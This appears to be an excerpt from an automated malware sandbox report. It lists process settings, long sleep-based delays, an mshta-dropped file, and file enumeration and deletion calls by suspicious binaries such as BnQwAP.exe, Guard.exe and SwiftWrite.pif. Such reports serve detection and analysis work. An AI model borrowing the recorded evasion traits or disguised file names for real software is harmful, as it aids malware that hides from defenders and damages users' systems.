Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1474Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1200Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 558Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5108Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4633Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6170
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4261
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]Jump to dropped file
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeAPI coverage: 3.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 352Thread sleep count: 1200 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep count: 558 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5376Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -17524406870024063s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6170 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 1800 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 4527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 4261 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00007FF65605C7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605B7C0
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560671F4 FindFirstFileW,FindClose,16_2_00007FF6560671F4
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00007FF6560672A8
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65605BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00007FF65605BC70
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00007FF65606A874
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF65606A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,16_2_00007FF65606A350
